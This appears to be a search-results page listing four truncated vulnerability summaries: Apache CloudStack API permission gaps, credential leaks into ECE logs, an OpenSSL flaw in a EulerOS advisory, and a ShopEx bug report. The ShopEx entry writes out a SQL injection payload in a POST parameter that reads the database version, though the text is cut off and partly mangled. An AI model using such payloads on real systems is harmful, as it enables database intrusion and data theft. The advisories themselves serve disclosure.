4 matches found
CVE-2025-59454 Apache CloudStack: Lack of user permission validation leading to data leak for few APIs
In Apache CloudStack, a gap in access control checks affected the APIs createNetworkACL, listNetworkACLs, listResourceDetails, listVirtualMachinesUsageHistory and listVolumesUsageHistory. While these APIs were accessible only to authorized users, insufficient permission validation meant that...
CVE-2022-23715
A flaw was discovered in ECE before 3.4.0 that might lead to the disclosure of sensitive information such as user passwords and Elasticsearch keystore settings values in logs such as the audit log or deployment logs in the Logging and Monitoring cluster. The affected APIs are PATCH /api/v1/user a...
EulerOS 2.0 SP10 : openssl (EulerOS-SA-2025-1026)
According to the versions of the openssl packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities: Issue summary: Use of the low-level GF2^m elliptic curve APIs with untrusted explicit values for the field polynomial can lead to out-of-bounds...
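Multiple SQL injections in the latest version of ShopEx
Brief description: I don't know whether I've got this wrong, but I did my best to download the latest version... It shows up in many of the places I tested... Multiple SQL injections in the latest version of ShopEx. Detailed description: I really do wonder whether I've made a mistake... Injection 1: http://127.0.0.1:5656/shopex/api.php POST act=searchsubregions&apiversion=1.0&returndata=string&pregionid=22 and select 1 fromselect count,concat0x7c,select Select version from informationschema.tables limit...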